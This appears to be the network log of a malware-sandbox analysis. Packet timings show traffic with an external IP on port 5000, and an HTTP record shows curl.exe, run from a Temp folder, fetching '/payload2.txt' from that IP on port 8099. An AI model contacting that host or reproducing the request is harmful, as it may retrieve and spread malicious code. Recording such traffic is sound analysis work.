                              Jul 22, 2024 15:58:02.703783989 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.703797102 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.703809023 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.703820944 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.703831911 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.703850031 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.703861952 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.703874111 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.703885078 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.703896999 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.705327034 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.708508968 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.708646059 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.708741903 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.708782911 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.708926916 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.708939075 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.708951950 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.709697008 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.709709883 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.710117102 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.710206032 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.710385084 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.710455894 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.715445995 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.716367960 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.716517925 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.716531038 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.716543913 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.716650963 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.716722012 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.717612982 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.717626095 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.717638016 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.717648983 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.717660904 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.718532085 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.718544960 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.722661972 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.722742081 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.722841024 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.722906113 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.729969978 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730206013 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730218887 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730542898 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730556011 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730567932 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730578899 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730591059 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730602026 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730612993 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730626106 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730946064 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730957985 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730968952 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730981112 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.730992079 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731003046 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731015921 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731026888 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731039047 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731271029 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731282949 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731296062 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731308937 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731319904 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731332064 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731343031 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731353998 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731365919 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731378078 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731389046 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731404066 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731415033 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731962919 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731976032 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731987953 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.731998920 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.732011080 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.732021093 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.732026100 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.732033014 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.732047081 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.732103109 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.734601974 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.734615088 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.734886885 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.734961033 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.737174988 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.737436056 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.737449884 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.737819910 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.737997055 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.738009930 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.738022089 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.738034010 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.738044977 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.739938974 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.739958048 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.739970922 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.742079020 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.742646933 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.742712975 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.743731976 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.743793011 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.747714043 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.748151064 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.748464108 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.749706030 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.749860048 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.750389099 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.753777027 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.753853083 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.757742882 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.759433985 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.759846926 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.760135889 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.760278940 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.760390043 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.760402918 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.760415077 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.760426998 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.760438919 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.764117002 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.764130116 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.768675089 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.768744946 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.768868923 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.768923044 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.774610043 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.774719000 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.774765968 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.774832964 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.774876118 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.774945974 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.774962902 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.774970055 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.775542974 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.775556087 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.775567055 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.775578976 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.775590897 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.775602102 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.775614023 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.775624990 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.775635958 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.775646925 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.775657892 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.775670052 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.775851965 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.776591063 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.776606083 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.776614904 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.816363096 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.816445112 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.816446066 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.816526890 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.821546078 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.821650028 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.821711063 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.821718931 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.821862936 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.821871996 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.821878910 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.822061062 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.822068930 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.822160006 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.822166920 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.822345972 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.822352886 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.822360992 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.822489023 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.822879076 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.822886944 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823057890 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823065996 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823124886 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823196888 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823398113 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823405981 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823414087 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823421001 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823429108 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823576927 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823591948 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823597908 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823605061 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823671103 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823791981 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823795080 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823797941 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823862076 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823869944 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.823968887 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:02.923222065 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.923284054 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.923537016 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.923595905 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:02.932835102 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.048523903 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.048645973 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.048860073 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.048928976 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.053819895 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.054510117 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.054594040 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.054940939 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.054981947 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.055190086 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.055619955 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.062251091 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.062325954 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.067281961 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.067305088 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.067718983 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.067811012 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.067923069 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.068031073 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.068041086 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.068051100 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.074249983 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.074341059 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.079750061 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.080183029 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.080513000 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.107444048 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.107517004 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.112759113 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.112850904 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.112895966 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.112977028 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.112984896 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.112999916 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.113020897 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.113591909 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.113601923 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.113631964 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.114111900 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.123985052 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.124056101 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.129070997 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.129264116 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.129411936 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.129527092 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.129601955 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.129724026 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.129733086 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.129750013 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.129834890 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.129843950 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.129853010 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.129951000 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.129961014 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.130004883 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.130058050 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.130063057 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.130079985 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.130158901 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.130167961 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.130234957 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.130331039 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.130415916 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.130424976 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.130768061 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.155320883 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.155422926 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.155422926 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.155472994 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.160365105 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.160639048 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.160764933 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.160923004 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.160969019 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.161098003 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.161108017 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.161170959 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.161250114 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.161958933 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162033081 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162141085 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162148952 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162178993 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162293911 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162302017 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162503958 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162512064 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162523031 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162535906 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162543058 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162749052 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162758112 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162765980 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162772894 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162781954 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.162791014 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163259029 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163269043 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163278103 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163286924 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163300037 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163307905 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163316965 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163325071 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163332939 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163336992 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163343906 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163655043 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163662910 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163671970 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163680077 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163682938 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.163686991 CEST500049785172.104.160.126192.168.2.6
                              Jul 22, 2024 15:58:03.164341927 CEST497855000192.168.2.6172.104.160.126
                              Jul 22, 2024 15:58:03.164397001 CEST497855000192.168.2.6172.104.160.126
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Jul 22, 2024 15:58:19.670135021 CEST192.168.2.61.1.1.10x960fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                              Jul 22, 2024 15:58:19.670432091 CEST192.168.2.61.1.1.10xf41fStandard query (0)www.google.com65IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Jul 22, 2024 15:57:57.744838953 CEST1.1.1.1192.168.2.60x58f8No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                              Jul 22, 2024 15:58:19.677860022 CEST1.1.1.1192.168.2.60xf41fNo error (0)www.google.com65IN (0x0001)false
                              Jul 22, 2024 15:58:19.678556919 CEST1.1.1.1192.168.2.60x960fNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                              Jul 22, 2024 15:58:46.119676113 CEST1.1.1.1192.168.2.60x3d19No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.649717172.104.160.12680992784C:\Users\user\AppData\Local\Temp\curl.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:57:46.718877077 CEST96OUTGET /payload2.txt HTTP/1.1
                              Host: 172.104.160.126:8099
                              User-Agent: curl/7.83.1
                              Accept: */*
                              Jul 22, 2024 15:57:47.923765898 CEST1236INHTTP/1.0 200 OK
                              Server: SimpleHTTP/0.6 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:57:47 GMT
                              Content-type: text/plain
                              Content-Length: 1941690
                              Last-Modified: Fri, 19 Jul 2024 08:16:47 GMT
